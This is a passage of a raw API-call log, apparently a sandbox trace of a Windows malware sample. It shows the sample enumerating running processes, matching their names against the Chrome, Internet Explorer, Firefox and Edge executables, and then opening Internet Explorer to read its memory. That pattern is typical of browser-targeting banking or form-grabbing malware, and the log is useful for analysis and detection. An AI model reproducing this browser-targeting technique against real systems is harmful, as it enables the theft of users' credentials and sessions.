	[0244.631] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.632] StrStrIA (lpFirst="taskhost.exe", lpSrch="firefox.exe") returned 0x0
	[0244.632] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.632] StrStrIA (lpFirst="taskhost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0244.632] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x590, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x34c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1
	[0244.633] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x590) returned 0x8fec
	[0244.633] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.633] StrStrIA (lpFirst="taskeng.exe", lpSrch="chrome.exe") returned 0x0
	[0244.633] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.633] StrStrIA (lpFirst="taskeng.exe", lpSrch="iexplore.exe") returned 0x0
	[0244.634] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.634] StrStrIA (lpFirst="taskeng.exe", lpSrch="firefox.exe") returned 0x0
	[0244.634] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.634] StrStrIA (lpFirst="taskeng.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0244.634] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xf0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0244.635] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xf0) returned 0x8ff0
	[0244.635] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.635] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0244.636] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.636] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0244.636] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.636] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0244.636] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.636] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0244.637] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x270, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1
	[0244.637] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x270) returned 0x8ff4
	[0244.637] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.638] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="chrome.exe") returned 0x0
	[0244.638] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.638] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="iexplore.exe") returned 0x0
	[0244.638] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.638] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="firefox.exe") returned 0x0
	[0244.639] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.639] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0244.639] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x500, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1
	[0244.640] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x500) returned 0x8ff8
	[0244.640] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.640] StrStrIA (lpFirst="sppsvc.exe", lpSrch="chrome.exe") returned 0x0
	[0244.640] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.640] StrStrIA (lpFirst="sppsvc.exe", lpSrch="iexplore.exe") returned 0x0
	[0244.641] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.641] StrStrIA (lpFirst="sppsvc.exe", lpSrch="firefox.exe") returned 0x0
	[0244.641] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.641] StrStrIA (lpFirst="sppsvc.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0244.641] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x324, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1
	[0244.642] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x7b8) returned 0x8ffc
	[0244.642] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.642] StrStrIA (lpFirst="dwm.exe", lpSrch="chrome.exe") returned 0x0
	[0244.643] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.643] StrStrIA (lpFirst="dwm.exe", lpSrch="iexplore.exe") returned 0x0
	[0244.643] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.643] StrStrIA (lpFirst="dwm.exe", lpSrch="firefox.exe") returned 0x0
	[0244.643] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.643] StrStrIA (lpFirst="dwm.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0244.643] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x61c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x394, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1
	[0244.644] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x61c) returned 0x9004
	[0244.644] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.644] StrStrIA (lpFirst="explorer.exe", lpSrch="chrome.exe") returned 0x0
	[0244.645] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.645] StrStrIA (lpFirst="explorer.exe", lpSrch="iexplore.exe") returned 0x0
	[0244.645] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.645] StrStrIA (lpFirst="explorer.exe", lpSrch="firefox.exe") returned 0x0
	[0244.645] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.645] StrStrIA (lpFirst="explorer.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0244.646] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x62c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1
	[0244.646] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x62c) returned 0x0
	[0244.646] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa78, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="shirts_cumshots_compaq.exe")) returned 1
	[0244.647] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xa78) returned 0x9008
	[0244.647] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.647] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="chrome.exe") returned 0x0
	[0244.648] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.648] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="iexplore.exe") returned 0x0
	[0244.649] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.649] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="firefox.exe") returned 0x0
	[0244.649] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.649] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0244.650] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="league.exe")) returned 1
	[0244.650] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xa9c) returned 0x900c
	[0244.651] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.651] StrStrIA (lpFirst="league.exe", lpSrch="chrome.exe") returned 0x0
	[0244.651] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.651] StrStrIA (lpFirst="league.exe", lpSrch="iexplore.exe") returned 0x0
	[0244.651] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.651] StrStrIA (lpFirst="league.exe", lpSrch="firefox.exe") returned 0x0
	[0244.652] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.652] StrStrIA (lpFirst="league.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0244.652] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xaac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="js_sound.exe")) returned 1
	[0244.653] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xaac) returned 0x9010
	[0244.653] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.653] StrStrIA (lpFirst="js_sound.exe", lpSrch="chrome.exe") returned 0x0
	[0244.653] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.653] StrStrIA (lpFirst="js_sound.exe", lpSrch="iexplore.exe") returned 0x0
	[0244.653] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.653] StrStrIA (lpFirst="js_sound.exe", lpSrch="firefox.exe") returned 0x0
	[0244.654] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.654] StrStrIA (lpFirst="js_sound.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0244.654] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xac0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beast-dry.exe")) returned 1
	[0244.655] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xac0) returned 0x9014
	[0244.655] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.655] StrStrIA (lpFirst="beast-dry.exe", lpSrch="chrome.exe") returned 0x0
	[0244.655] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.656] StrStrIA (lpFirst="beast-dry.exe", lpSrch="iexplore.exe") returned 0x0
	[0244.656] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.656] StrStrIA (lpFirst="beast-dry.exe", lpSrch="firefox.exe") returned 0x0
	[0244.657] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.658] StrStrIA (lpFirst="beast-dry.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0244.658] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xad0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="forecastsgeographic.exe")) returned 1
	[0244.659] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xad0) returned 0x9018
	[0244.660] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.660] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="chrome.exe") returned 0x0
	[0244.660] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.660] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="iexplore.exe") returned 0x0
	[0244.661] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.661] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="firefox.exe") returned 0x0
	[0244.662] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.662] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0244.663] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xae0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="reno.exe")) returned 1
	[0244.663] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xae0) returned 0x901c
	[0244.664] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.664] StrStrIA (lpFirst="reno.exe", lpSrch="chrome.exe") returned 0x0
	[0244.664] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.664] StrStrIA (lpFirst="reno.exe", lpSrch="iexplore.exe") returned 0x0
	[0244.664] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.664] StrStrIA (lpFirst="reno.exe", lpSrch="firefox.exe") returned 0x0
	[0244.664] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.664] StrStrIA (lpFirst="reno.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0244.665] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xaf0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="specreformwear.exe")) returned 1
	[0244.665] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xaf0) returned 0x9020
	[0244.665] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.666] StrStrIA (lpFirst="specreformwear.exe", lpSrch="chrome.exe") returned 0x0
	[0244.666] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.666] StrStrIA (lpFirst="specreformwear.exe", lpSrch="iexplore.exe") returned 0x0
	[0244.666] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.666] StrStrIA (lpFirst="specreformwear.exe", lpSrch="firefox.exe") returned 0x0
	[0244.667] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.667] StrStrIA (lpFirst="specreformwear.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0244.667] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="rr_publications.exe")) returned 1
	[0244.668] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb00) returned 0x9024
	[0244.668] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.668] StrStrIA (lpFirst="rr_publications.exe", lpSrch="chrome.exe") returned 0x0
	[0244.669] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.669] StrStrIA (lpFirst="rr_publications.exe", lpSrch="iexplore.exe") returned 0x0
	[0244.669] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.669] StrStrIA (lpFirst="rr_publications.exe", lpSrch="firefox.exe") returned 0x0
	[0244.670] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.670] StrStrIA (lpFirst="rr_publications.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0244.670] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb10, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="solo.exe")) returned 1
	[0244.671] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb10) returned 0x9028
	[0244.671] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.671] StrStrIA (lpFirst="solo.exe", lpSrch="chrome.exe") returned 0x0
	[0244.671] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.672] StrStrIA (lpFirst="solo.exe", lpSrch="iexplore.exe") returned 0x0
	[0244.672] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.672] StrStrIA (lpFirst="solo.exe", lpSrch="firefox.exe") returned 0x0
	[0244.672] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.672] StrStrIA (lpFirst="solo.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0244.672] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb20, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beam.exe")) returned 1
	[0244.673] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb20) returned 0x902c
	[0244.673] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.673] StrStrIA (lpFirst="beam.exe", lpSrch="chrome.exe") returned 0x0
	[0244.673] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.673] StrStrIA (lpFirst="beam.exe", lpSrch="iexplore.exe") returned 0x0
	[0244.674] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.674] StrStrIA (lpFirst="beam.exe", lpSrch="firefox.exe") returned 0x0
	[0244.674] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.674] StrStrIA (lpFirst="beam.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0244.674] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb30, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="configurations.exe")) returned 1
	[0244.675] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb30) returned 0x9030
	[0244.675] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.675] StrStrIA (lpFirst="configurations.exe", lpSrch="chrome.exe") returned 0x0
	[0244.676] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.676] StrStrIA (lpFirst="configurations.exe", lpSrch="iexplore.exe") returned 0x0
	[0244.676] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.676] StrStrIA (lpFirst="configurations.exe", lpSrch="firefox.exe") returned 0x0
	[0244.677] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.677] StrStrIA (lpFirst="configurations.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0244.677] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb40, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="fact-film-anticipated.exe")) returned 1
	[0244.678] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb40) returned 0x9034
	[0244.678] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.678] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="chrome.exe") returned 0x0
	[0244.678] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.678] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="iexplore.exe") returned 0x0
	[0244.679] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.679] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="firefox.exe") returned 0x0
	[0244.680] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.680] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0244.680] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb50, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="wanting villages.exe")) returned 1
	[0244.681] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb50) returned 0x9038
	[0244.681] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.681] StrStrIA (lpFirst="wanting villages.exe", lpSrch="chrome.exe") returned 0x0
	[0244.682] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.682] StrStrIA (lpFirst="wanting villages.exe", lpSrch="iexplore.exe") returned 0x0
	[0244.682] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.682] StrStrIA (lpFirst="wanting villages.exe", lpSrch="firefox.exe") returned 0x0
	[0244.683] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.683] StrStrIA (lpFirst="wanting villages.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0244.683] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="engagementresearchersmonkey.exe")) returned 1
	[0244.684] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb60) returned 0x903c
	[0244.684] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.684] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="chrome.exe") returned 0x0
	[0244.685] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.685] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="iexplore.exe") returned 0x0
	[0244.685] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.685] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="firefox.exe") returned 0x0
	[0244.686] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.686] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0244.687] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="surgical-marcus.exe")) returned 1
	[0244.687] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb70) returned 0x9040
	[0244.688] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.688] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="chrome.exe") returned 0x0
	[0244.688] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.688] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="iexplore.exe") returned 0x0
	[0244.689] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.689] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="firefox.exe") returned 0x0
	[0244.689] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.689] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0244.690] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0xc0c, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1
	[0244.690] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xc38) returned 0x9044
	[0244.690] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.690] StrStrIA (lpFirst="iexplore.exe", lpSrch="chrome.exe") returned 0x0
	[0244.691] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.691] StrStrIA (lpFirst="iexplore.exe", lpSrch="iexplore.exe") returned="iexplore.exe"
	[0244.691] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.691] StrStrIA (lpFirst="iexplore.exe", lpSrch="firefox.exe") returned 0x0
	[0244.691] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.691] StrStrIA (lpFirst="iexplore.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0244.692] NtQueryInformationProcess (in: ProcessHandle=0x9044, ProcessInformationClass=0x0, ProcessInformation=0x101f2e4, ProcessInformationLength=0x18, ReturnLength=0x101f300 | out: ProcessInformation=0x101f2e4, ReturnLength=0x101f300) returned 0x0
	[0244.692] ReadProcessMemory (in: hProcess=0x9044, lpBaseAddress=0x7ffdb000, lpBuffer=0x101f0cc, nSize=0x1d8, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f0cc*, lpNumberOfBytesRead=0x101f310*=0x1d8) returned 1
	[0244.692] ReadProcessMemory (in: hProcess=0x9044, lpBaseAddress=0x2b11c0, lpBuffer=0x101ee3c, nSize=0x290, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101ee3c*, lpNumberOfBytesRead=0x101f310*=0x290) returned 1
	[0244.692] ReadProcessMemory (in: hProcess=0x9044, lpBaseAddress=0x2b1998, lpBuffer=0x101f40c, nSize=0x20, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f40c*, lpNumberOfBytesRead=0x101f310*=0x20) returned 1
	[0244.692] StrStrIW (lpFirst="Winsta0\\Default", lpSrch="default") returned="Default"
	[0244.692] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc94, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0xc38, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1
	[0244.693] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xc94) returned 0x9048
	[0244.693] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.693] StrStrIA (lpFirst="iexplore.exe", lpSrch="chrome.exe") returned 0x0
	[0244.693] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.693] StrStrIA (lpFirst="iexplore.exe", lpSrch="iexplore.exe") returned="iexplore.exe"
	[0244.694] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.694] StrStrIA (lpFirst="iexplore.exe", lpSrch="firefox.exe") returned 0x0
	[0244.694] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
